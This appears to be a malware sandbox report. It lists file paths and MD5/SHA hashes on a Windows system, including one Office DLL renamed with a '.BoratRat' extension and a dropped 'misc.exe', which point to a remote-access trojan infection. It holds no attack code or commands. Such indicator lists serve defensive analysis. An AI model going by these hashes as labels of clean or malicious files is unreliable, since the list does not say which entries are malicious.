| MD5 | ba5175d67012b990cde1d9dfab50a5f0 |
| SHA1 | d645692c36d99ea33c673c881020466e24264d6f |
| SHA256 | c76f129ddd2f8d3f97b82c3f9a2ded31795c53279a44f8f974eaab301aabff48 |
| SHA512 | 88e3f96081eab35a04b6139d7759a2d2e292b689d032fb95390e1535d6dda80139bc40a5a87bc066f6b713d00f64d1c809e03e54c296e32e401544c1c032b27e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | a62d3a19ae8455b16223d3ead5300936 |
| SHA1 | c0c3083c7f5f7a6b41f440244a8226f96b300343 |
| SHA256 | c72428d5b415719c73b6a102e60aaa6ad94bdc9273ca9950e637a91b3106514e |
| SHA512 | f3fc16fc45c8559c34ceba61739edd3facbbf25d114fecc57f61ec31072b233245fabae042cf6276e61c76e938e0826a0a17ae95710cfb21c2da13e18edbf99f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | 73533a707f5c01a04c90974855b657b8 |
| SHA1 | 890aa7a804e08dd5a2d3dbde185a439566951b8a |
| SHA256 | 8bd56834778960472c974babbbbf68e309ec2a245a62a9fef73c0cc5f1f6c0e4 |
| SHA512 | 475fff0fb4de502d13fcb201e4048a079b2f0451d5c0338c726fe572f40f43d52f7c09874ad13806305ef67a592b9266bd673be51d4cc657342f9ba03a65c1d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | 8d49ac0f89410bc8df7d426241555514 |
| SHA1 | d24c37bf3e0396c9d861f7ae71672efdfe4aeeb3 |
| SHA256 | d768fbbdc5a2a234ef9f17ca7150cc04cdfe2239ec004decb00755062e8a9394 |
| SHA512 | c0753dcf48fe250ff7627afa9d9334841ac344f3f85c53ee1a134483e51a524ed8e67d5976a36100ebc54072b1820114d8994adf0dcce1ab6b7dd338aeb28be5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | b7bc1fb78dc43625c372f723020fae2d |
| SHA1 | efe8829ecbf752566470f109148fe16ebeaf5ec8 |
| SHA256 | c107cf956bef3ac26669094160e795371227b0c8c3d757a23a8368f82ec091e3 |
| SHA512 | c8534438931077edbd6da8a4826fbbe30834573a6b40863afa8bf6de658b0a067318dae83062ca6baf31f70c32934d8111b3c90eac1bedfe1094a8616e7545d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | c7a821c65ee9655eebd47e1ed7b991e3 |
| SHA1 | ec75d748e5a0dbd0b6ef38e14be9dc69a9ea417e |
| SHA256 | 38b3a65d8cff441d80829d67893c51eb72eaf2f553b9dd316005010b034063d7 |
| SHA512 | d4653aef613f44e08dc26d0e7212d32ca918d986203e71dff9224d01ded92c2a11d4121bcd5d9332d57605d4123168f9a4dfaf02aaee26ea879b65918310d7ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13364160360912901
| MD5 | 16156abd967973c4f7229426521d4d97 |
| SHA1 | 5a57d3d46d19b60b9190f564a9c31f8f760866bf |
| SHA256 | a13cb33931957a0efbd971d41490ff53ec3ba623689c6a69fc9070640d8f48f1 |
| SHA512 | f06b3606a2493cfc7f0f035c30fcaee746e967d8ff2dc9f2f62da92cdd3c9a0d1e184ecd8701fd45cc2f2c20fa6799733db51ba71e4f5c0c6b665b613c92a9cd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 5543c240340c5afacd239345d10722e2 |
| SHA1 | 77b6ed42ee0c4087c6512aee986a5c7b416aaf24 |
| SHA256 | b8a0f3e84e8e104997c8296849255468a2e39689b4f01e8d6b5e4c896dbc4330 |
| SHA512 | 53ef79d95a437254a950329013c586ce7425d4c082c11dee9137b8eb333c41d72b4f86afb716186c7e7389b0f21fa7d624fd1deb2f025e67b9cb923b2e7f938f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | c654f353879670bc5a6d4097e26e19ad |
| SHA1 | 6f686aee05b7e6537255d207e201e821a7233a32 |
| SHA256 | 917689399634f044af89c129cfe27a32fdfa1d733620021c9a7462c6aac87238 |
| SHA512 | 3307a51899aadd447f87810a3e5063d94b4514a204aadb92e1b4e9d04303e8ad50be30e2efb3037780422a835fdd4c296a9df78c509afc7441dbb4c16b7d71f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c908c4d357d37a4f6b55d70a123b1fff |
| SHA1 | 7402c0b2eb35a2178442c861a431765013b9eb69 |
| SHA256 | 44a18b565aeb2d1a6c56589633d3a2a6bf9cf160d1e056fa16edf6d49dc79970 |
| SHA512 | 4afddfabccf27513a03230293121178f75b5a5b8396d819f26ffc703125f888bf81d96f832846b62bf1a0ff6dbcbfef8a45f5d76103977a808b1b09b5d9d33c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 307ee4b93b889f22eda3f3e687349afc |
| SHA1 | 08157b597d98463b93216a14e1bfcddf4cd54473 |
| SHA256 | 22794e32d1e91c47caa32fe7d45ef159d32cf1c797235cd60bb921af8be0fd78 |
| SHA512 | 923c7d92a0d0953222e5e35d97851847b6b4aaa21dc2d0bea430cd242cb43784274ac8e584ec05059decbaa2bea65d87c6f2e0de973d2811be792343355a610b |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l1-2-0.dll
| MD5 | 1dec39c5adfda9dfa7e7d98fe2c9bc71 |
| SHA1 | cc1ca16d36cf5f23c5cd69bb3f4730f05814f602 |
| SHA256 | a597fad3dc0add34db2503991975b2e734bd8c12080d1af5119b5db7cdacc9a2 |
| SHA512 | 63a57a5e543a041d21b536c543ea0c11aa646141e4423fe055f314e22801cc9e1176b494bcf221dedf3d6e3560d43d15eebde2bab0b551ee5f6c3df48177819e |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l2-1-0.dll
| MD5 | 71013d0511c2af41289992e6ab7e8072 |
| SHA1 | 23bc4d5f0e61d402078b064d9d924a50abc9e623 |
| SHA256 | 67e400ba678aaa793b3b139eea186269a6c0ed843bb0162fe56c4daa26169df1 |
| SHA512 | a4e35527fdeccd140239bce6acb0cba81af580f202ff1da277529188a1470adf5a264244de71e804ad08ef1026f5a666c6f9388f48b7e50cb430b3a5e79c5514 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-localization-l1-2-0.dll
| MD5 | afd7c5f4f7869c2e02db6b88a4eba035 |
| SHA1 | 9a881d528710b156690726d7a655d57bd760a1fb |
| SHA256 | fae11f68f303f2f67a8634ed6904b879304119e81c349f88cf25bdfcd12dbbff |
| SHA512 | e89adeefe0d1fb6f9a516f7fed29d9ec35ebe5b1b54c87e88a7e3b49ec757208b7af870db72c1378c684ad4919fb4850e7983ec820dbcf7408d22c78f6187cf0 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | cf803b4ec86a2ee10d6eb9dc5bd05a5f |
| SHA1 | 921d55b52251190032e8c09e165dbf5901f4f03b |
| SHA256 | 649efb6f8cf0083ba5ef60ac4fbda80b9ea68fd8d6ac95382d6a2c46b890b888 |
| SHA512 | 6e61e31f4321b659d64e1b061d7efe097d99b968958b07b2c40662302e27e99d29a94b951c9627af4af98f8b423bd139ec78e8c93184a3eb19e5134e0d02eb8a |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | bcad5d9a7024b7fcd2faa1abf783bca3 |
| SHA1 | 66e41b3ce0be55db2aaa532c4b74b1ec46b38785 |
| SHA256 | aef0e5129e8773bb825590337909211f55a02959003fd6a512c32c86db7dc984 |
| SHA512 | 7bde6991fba2cefde4f93d0c5c3ee9ad93bfc3ca891151efe84066d8f146e0938f64c6af5ba5e5506abbded8c7a79f9004d0eaf9dad9683e0b64b7e6046d4fb4 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-synch-l1-2-0.dll
| MD5 | a8a44848a3ed939a510baf520db56133 |
| SHA1 | 5cc33a46975e86b96f5c84dd520980806acb52a5 |
| SHA256 | 4865b14c297ac5ffee739bac2c438576a4436309ae167a3c4a862609d648e266 |
| SHA512 | 5ac9ad9db80a560e84355e67d683af8569ed5017cbe157e340b2888332e33dc90820917923be6578f35d2b6e04df11ba95348e2b0c8ba3da3d796ce39e3be1c3 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-xstate-l2-1-0.dll
| MD5 | 89ac8da153e5169d8029c8db7cc95143 |
| SHA1 | 33b0053d00fc2be2385f76b8e45452348aa280a7 |
| SHA256 | 3e1a1167687c2689e762996f41f3a0bc41f7aaea9e299f2d3a4839b363c65983 |
| SHA512 | 6cc25b2782f65756ea9a57b686625d8bec25758daa330988395b8d853822e9710783ccd5ddde55d615c7fb02712c8ca8f4b6ef2162f42ead041962fe71c7d05c |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 8fdcb400daab836867f6af3e1aec161b |
| SHA1 | 4ad8ccf0dd80c1b6b39a272196bd3bf9c7c30081 |
| SHA256 | dd94e3a67517388f9a02b919345cbfad20f73b1e6a40d5d9c7fab659c564ff77 |
| SHA512 | 6923c87869f62b8b58de1e59470348b59b911034e6d690f9be69db76f75fc5691b232f179dcc8db46e64c62b6f82f79488c37fcf12a58022e50432e952306b96 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 9fb5bf5cb7e83c26d6486ebe1007abd9 |
| SHA1 | b6857e0defabbebd0c927009a3860bd793010d64 |
| SHA256 | 7e25ee76e2bbcac034eb7a7a63a3df429e458835b592e196f3069111682ff8e6 |
| SHA512 | ee1f992ebba4bb2980332bbea470d5f47a4813b5aef01035180db87396c877606d54482440f6eece97d77236d4b9acfedad6dc8e39d8ab3ea73f93cc97263478 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | e66ed9b3c8d2fe8009854dce1fb67d14 |
| SHA1 | 7577b6bf95315f089a310af6a57e36733a8d4c9b |
| SHA256 | 43e4d190498781a78814b40834632add3abdbc0a67073c30910e9874246dce33 |
| SHA512 | 36501ea728863e305929e55f276c20533a7536507351ff97eab7c53a5bc6b70f0d8dd06aa0c67d96f1ae7d88d8924e7f1f5cb65e7a7f32a829a52b060768e03c |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | 81ad66c0b4525c166ca474fed1aee74a |
| SHA1 | cb6f8a2f4307499d15c6b0421b8143d4d2a811e8 |
| SHA256 | f27de3672842302c1cda3d268a8ceaac6eee8b1c45cdf5028a4e9d715141710c |
| SHA512 | 36e9da7296631153c9b4b68e88d63f24575c12516a257be10127bf375d67f534811a02b9e1f7e63ffc1e290f073d508781d5ffcfb559d8981876c863de37a6af |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-heap-l1-1-0.dll.BoratRat
| MD5 | 7c025c27517bdc612ae60c8bb35cb7cc |
| SHA1 | 53815f9e818eedbd7321ed59604e930ea7209b43 |
| SHA256 | 93cc10b88f78efe7d3de10e73aa375d8c3c0d4f320df530f7b544e4fb455a680 |
| SHA512 | 30b5903fb97bf1ec8fff405316ab5715a9ad6b0ff559d37e214abfcf7ed8d298f20cab3406c492d07494c774db0ed63de2dda953d7e0392aa32aaa81d58cceeb |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | fa1f159104ab7793caf8ad9c9de41bdc |
| SHA1 | 6f5d736205001d19c7c7a267531b325164c2c3f9 |
| SHA256 | 89798d09d303775ab9bb867f10956fed3a67c41c3a518c818dd5cfdf5c69c7cf |
| SHA512 | c4bec5bc62acbf71d2b0d414f136607625623f731880c91c86dc8ce21586a027c8cba6572c18e7dbc8110a19394ac82a26610e78999640c76665fd94cc2cb172 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-math-l1-1-0.dll
| MD5 | ef896825fec3cd1d754787b76ac7c232 |
| SHA1 | ea7da1f78dbe49b973f63920c4c90022796cdae2 |
| SHA256 | 3a5882860030b83b9934dcbfb40c7245376c7145cb08c0a845b9c06cf9a7e728 |
| SHA512 | fd2fec0c40dc21fad098afe73d3a36d7031d00f42336a3ce175479da80cff9d3ea42a635005af1135a097566f686e2b6f04238a22fb67fe6914d313bd2e9f957 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-multibyte-l1-1-0.dll
| MD5 | 1d60ed17184cf352b3f065b6b1f1506b |
| SHA1 | b4410be372e0a2e48abb46a08f94843f70c5fed2 |
| SHA256 | 4d99e051870df3cc5f1b33c406a8f6b353c44c9bcdd863be2cb39d24b2e88348 |
| SHA512 | 4c9093873e9c67cef67e79b6f6c6b12e9ca5f4ec9f8f2a7a7cc392346bd094164da7d7b3b510840edb249d527164d9e719cb3ae542b1a9db7e28d68c8a0eeb3c |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-private-l1-1-0.dll
| MD5 | 6fffe57d0c3cdbb70e49c75acf9c54f7 |
| SHA1 | 1d611e4668fa15b82ab6f740f7ac43787cbb83c4 |
| SHA256 | e59b80f9d0dfbea0e6df73baae3a0c3d441d3e1edd811fb8bbf0ad66d0dc1e9d |
| SHA512 | b6e838c4f8fc658b5db3bb7786bd89da286ed20037503823ffdccab0cfaaf8da73c95dcca32f44dbdbbaad327aea1aad3df952793c12d9ae25a28e34a82487c3 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-process-l1-1-0.dll
| MD5 | 4fc8685d592b8d28c215281021f7ba62 |
| SHA1 | b26196797d1dacb5a0b154405c5d6e95453d6a77 |
| SHA256 | 60ee60a06e9a061f1a3c9d01bb3bf544923129bbdc32a27a61951dee063f0d0c |
| SHA512 | 0e2ebd7d36fa3beddde3f333d4d10dd64e1dc4ef962e9c85c3fa1c0673121817c2a5bac14c5207dea2e8c7a478af93f5d8c9dcaf9cab9830dd2f3145d595e29d |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | dabf29579f799b7da929820e570777dc |
| SHA1 | 8d517556b80a2f1a210bc153466d10b4f4436c0e |
| SHA256 | b23a182b109da7b27abb491d1c45de086d6a5dc7403db31454015072f8c0c6ad |
| SHA512 | d264be09544f6f259fe3edad79fcb16f2dcfd50f1761135ce8bc37d267b307e5f8ce4ec0a979746774ff361971708e0afca1a733cf5cec7da56660c8219853da |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | fda8452ec010a350fad2041f07fc03bc |
| SHA1 | 829849cd704c4917c15704d3c8fc218ce0ff1418 |
| SHA256 | cc2f1e79bb3e0d3e585a97501a3fdb8af2f04748fdcc6dfd50d46629577ea81e |
| SHA512 | f6e603ad7c34c9cb67584655e843a50dab4ea7e99f3938d5e8d6f6b879e7fba4e898bafa8e73c7eaa471e2aa64a59ea7b40f9dad1c9f5dc9e6b90a1bf6ce33c3 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-string-l1-1-0.dll
| MD5 | f545d077e959436712c7278dc8871896 |
| SHA1 | 7cab58f8b3390e3c401b8866705cbb5155834061 |
| SHA256 | eb3985f14fded950b03d6993b1c74a9c6de4aacdab25e1250a1c5f61b7f3869b |
| SHA512 | 6319af1a147323dccbe3694e77b2e84faf5cca19bc205c418fc1b0d32386cf60769f24005dcb1949a59c1c5e41aca5e63e6990312385990e8dec1b4ac688c171 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | 93983e003d6030b5ac79c9da5c340206 |
| SHA1 | 8978adb85adf7aa851aca8ea287be581403b0162 |
| SHA256 | cb3387e8dd057c247f55a51e34d5ffd7347e3cf7963c669dc3142c2fecf8eb22 |
| SHA512 | 99cc8c961ea325462f45b7304ff9ffb160cb724924c3c2805c9fcf44ba0b15c4d56ecf6726cb495a427c0fdbbe360456fa7e77e3c477497b4a14b3b2f000fe4f |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-time-l1-1-0.dll
| MD5 | ce8ae2941d6e4236664bf3b72fdab5c0 |
| SHA1 | 694e07ba17e16fe621cac884e85e4afc05450365 |
| SHA256 | c7c302b541ee4bf0c0807abd762b829a7ec428d1df6051d25dce8f245463bac1 |
| SHA512 | ec8d9ea5c05b39b490c21a42baf9e229da4d183565fcca9f9726b3219cad6183582f6331d97270b92bdc32b5c598e01fa90585dce34600fa4b3ec61b2686a5a9 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\concrt140.dll
| MD5 | 7d1c503f28512aefb380e837c61b1d3e |
| SHA1 | 48e0d9b3e76944d4247337db87d81301f70bf143 |
| SHA256 | 4b5f5e1ac329519e08e0f3a9b154970592278228573510d85c853ce9d482c489 |
| SHA512 | 4e94023b0519ba646a6fc4558508426f99d518ba98cec600421ab4e500f4d4ff4e361822c669530187d485a14f9352dd70799a470362ccba802d734c9b719960 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\mfc140u.dll
| MD5 | c366e114f9e2bf94395b38ed744f1d67 |
| SHA1 | b8575db3ec016cc0264475daabf6c461146a789d |
| SHA256 | 581ec3d61632ddc53031f75dae2f59796800f2956deee12ff0e28a8f656d745b |
| SHA512 | cdd5aea271331e549ee5c524b116897a89f0815ec055f2ba1478e1dca07af4855e8fc0955bfe6db98adf6e1d553d1bfcae0803893fa600c77dc99a49f1473f83 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp120.dll
| MD5 | 1b527f78edb44dda4ae42bdcaa2cec1e |
| SHA1 | 339afe868f375420fa3611db8614db0acb603111 |
| SHA256 | be93b467e655ef7740913fbd049c48aab7454ba1c04f22d670fec764d658a0e0 |
| SHA512 | 0d9777b9ac3a068322a563c1cdcf40ee71480446963d3b19d91fec5164094d5841b7fbb7eae056bf94ead78448ad108fa23d02ca82671d180ca1199756ab0ed2 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp140.dll
| MD5 | 81a05cad5e1b32490ce9433e272900d0 |
| SHA1 | b32617cf6c32f76d777a2d83766a28b42a34cfd7 |
| SHA256 | a0e6c6eeee5a8928a8ac6876028b4028f45ea001eb7907d2cdac2dffe5d6e29e |
| SHA512 | cf05ae02f255573a6ec5b78c0097073c082c0bf9c6932b62209f59e139e228b1c69ed32b759bdbdca8445849b1e63166426d36c2265a69517b6fbcbc9927ff52 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcr120.dll
| MD5 | 0079aa35213c0e144162270c78d5a391 |
| SHA1 | 5c1662659f63b3553f6def3f315f03ae97f6627b |
| SHA256 | a5b80b477424a64a02340083b559176115529e85aa3f53a6324e75abca8e20ba |
| SHA512 | 189e672ae3a2ba11e23064170715a67d4c50e64fb25ee600b8ec212413b9aa98c26df3085623aaa7d5b91e38ec197171a75bb367628cd22e97830893f61090e2 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ucrtbase.dll
| MD5 | 636d90f6a500a395ca650ffbea536770 |
| SHA1 | 8fd8b7a27b4a84df35cb6c71f294791d8c136c35 |
| SHA256 | 39b75091720ff7e9eb4bb845074bcffa5295a55e2f2c9827a15c24e79b44fe05 |
| SHA512 | c04d0e3af947598ed5c4a6c3788febb37d2b256ef3f0117664111db3f6952eac80949355ca1fd78c794b7e594d04b3a7541b3c323c45b71b21b316068aacbafe |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vccorlib140.dll
| MD5 | 655eb892a215f8302a67fabf9188f0fc |
| SHA1 | a81c6987e33c7ed1699bc5ac2386e6d12b2b7f92 |
| SHA256 | c615adbf8b794d479bcb7a342bac62ccd3a52bb82376cce550a1883414c6e949 |
| SHA512 | 8f48134de52571d68b775ca0be770cb44981ed0fe2eb4f6420d193edfa54babafcc57ac31ac93c207ef9073703165409fda32c9c5fcbff1d4df7278b99842090 |
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vcruntime140.dll
| MD5 | fa6c0bce57f12e412f4b05bc378cfa8d |
| SHA1 | 7b3fd7a72555e69b6750da67ccfde5b1b7a1616f |
| SHA256 | 2af06f6ad2591e3610637842ce8f98f78a027682ea7b30242ed8e362fac6f714 |
| SHA512 | 2a5b11676aa693d40971508225161020e6e90cb661af2c291801c9d9c228635db085385f8a6be73400581abf006072185f6dca00a6111e19873e3279f4c1b969 |
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe
| MD5 | 39bdfba28edb9e4b6d576bb67e99bb8d |
| SHA1 | 4347f39fc1e7d4a7059c387b5cd80e23db3d7635 |
| SHA256 | e524c3572fd9f72c7cb76d479b6aee9fd73afa9cf353f112e1a224c6be09cc87 |
| SHA512 | b339a6ecba8a377a6ba41a53ec229caad196bbdede739dedbe98874a7d22da9cd479082225c85bc9897a6271cb9a9b935b79e594fdfa818ace61140488141af8 |
C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo
| MD5 | fac56cd557db9c6416ce5f79c1929ea8 |
| SHA1 | 916142d96c2380a583595933a761707741378f91 |
| SHA256 | b876153dc1657f2fe2bf2e1d36c7cbb1d3740ef26d1e21a23f12a9f9a56d47ad |
| SHA512 | e0a9ffa60a37d138e90bd7059555c26019c5decd20f4e83c7ae89a81cc7e40b798bfe16cc30c2d1ba653f3cd9026121df275915c082eeffb16de1aa99e7fb734 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | c1352cdeb4b984de1b535ba1786a4c90 |
| SHA1 | 8611d477883572a9e25d63d22eded8a041aa72a8 |
| SHA256 | e117d5bc8901464f683ec5cf36f613fdf117df5683a3b7e2fdf280ed94b1b462 |
| SHA512 | ddd38ccf4dd3ed454b0834e7c204bd328155777669da458c6c118a4aebb8c8437241d82f1a36b8fad07155379df335cd56afc393d1ab661a63de9418ea6dbc8c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 46bae5da9e1608697ef109b71b0c85bc |
| SHA1 | a9d31a89207cbe82ecc1844bee72fee549207498 |
| SHA256 | 54769c863675ad43d0b3d357409c4b41ac3f431973c6480c137e0c00929fb84b |
| SHA512 | 7127f38ea338d17999d5f60df09a1a9521c7fff09f6445cfd8e7631ce07a70f07c6077a1660811a0035091ca1c7e07bd1e099049b7de0cea89ff37a30e6fd155 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b3d9b758fbc6185f068a33abcb8c0f17 |
| SHA1 | aabf9e1ca931748db2fac62732222ae3559fbb28 |
| SHA256 | d20177ccb0e1fb828113e666b40adcae760d1660e49eafaab212d38081a60742 |
| SHA512 | cbb9582f5bf49203a03dfffd5a991f7413f22c55d56cc1b908f856148681ef3fc4cda1aed7735fdb814c5f591d332988055f6bf9c1104d8331ba0bf588937d4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 2b648ba9618df3aa088c0d348bb6a53b |
| SHA1 | d9e5333f8958d25ada287c710f03e244cb61cb56 |
| SHA256 | 04e259fd19a6b12d382d465f50f6588d4fe7587f87b05c437a4ea1eee8fe1918 |
| SHA512 | 5dae5b2d1d519c6fb4ce1ca74a17e51ff4d1e4518a675e64b3b29358d274821f40b112d221dc78c07048e60b36bec8dd6dd59ca3361e9d504d9440e75b603d92 |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | c231e6477a9b88cc1953697767b7e8ce |
| SHA1 | 0d872059471c71b79f260151586645201afa6aa0 |
| SHA256 | f3e5026d028864b10e54512930164daff14eb9c6863f2c459d69333b2c8e4313 |
| SHA512 | 158642b202b39718a4d2efd57bca0ee1ced92fd9a48a5bc26b88d7c138f315144d04a53571f82623a682cc5c93d3d8c2bb862b2d7b09d2051609e5d0270fa043 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png
| MD5 | 2bcd76e70e270f4d9b0404887ff9309c |
| SHA1 | 657bafb280f78c8bbf2027d16f3e0f21595d9d0b |
| SHA256 | aff399fcdd6d2d5c9ad5672b28a2650f2d2d8966f7641cf8e1dd9f4ed7c9335e |
| SHA512 | 864b80e8371e9b64fa71972d2ca54d8eb67a8abce6610699ea7d8482aa9b10fca1c3b470c77e651474c3600818acb99d09b1fd08590de69113a505a4c626969b |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions.png
| MD5 | 9fdd3ea9132d1ba41e9dd26e23ebb047 |
| SHA1 | 242762baa21fa809798619b22415b1ecad9b7379 |
| SHA256 | 5158d24f88c9f2b4f736da89b067fa185ad5c9b709138ac5985ac45093d4c230 |
| SHA512 | 95338657100f45f24774ed3c178cc6ccc41fb8c99ac67b26d7091d3e59ceec2cad2987b21c05dc0e987e6f9c06890fb26de73d64a75d148788f8f74f6938e6a4 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png
| MD5 | 3e1b9034fffb589e141fd92a8c5659da |
| SHA1 | d17b146c4bb8dc7c8e149c6f49df719decd88432 |
| SHA256 | ccb2cd07c2934502fb09e58bf190c4286d6decb9702bb7547c86cfc396e0c4eb |
| SHA512 | 41112c8ce7d0be04ecc8bde59f613d52342e0d76b121ed71afdd16a0176727867ab94402de4203a8b900e1fc949d887aff587f577a58d6cb1db502fbd25927bc |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png
| MD5 | 1b967d6db333e2c943deb96f683294d1 |
| SHA1 | 4eb9732299c5cac83253b12db5c856a2377364f8 |
| SHA256 | 4d0b765ca0f5a1c81d73a8433c79eb2a2c50e80bab44794dfc50f443290e2d6b |
| SHA512 | 07f59a8879b1c19b629b30d2ee6b3c996e89635d4c692a2eb8dfb6c135c879cacbf6284bc6376fcbdb6ac4c1782f75bf767cb6ba2b32342c3093e2a5b3fbbf5a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png
| MD5 | 73d2d111b055d4664b078b834f26ab2b |
| SHA1 | 6fb2b734767c75975a6bde9c45b6080f522c77c1 |
| SHA256 | 7d433dcbcdfa9b17978639e6c0be371f8474683f4b69542433da9ce7f29236aa |
| SHA512 | 357127b51139795f0f63eb911d477cd6c128c79fd18f5a9a06bd8e030d3730260bd378354f00b51f8e8b3962989ef73af8befdaab3903346c95c3fdc765f1c6d |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png
| MD5 | 3312ec3e84757d9010bfcce334b17d00 |
| SHA1 | 1f7bc53f87314ca45ff97a4bea4b94f56ffd2b37 |
| SHA256 | 9ad6e097e6c3475829e414b16996e4d0d56c55f448b8916479b7d51a8b1c2638 |
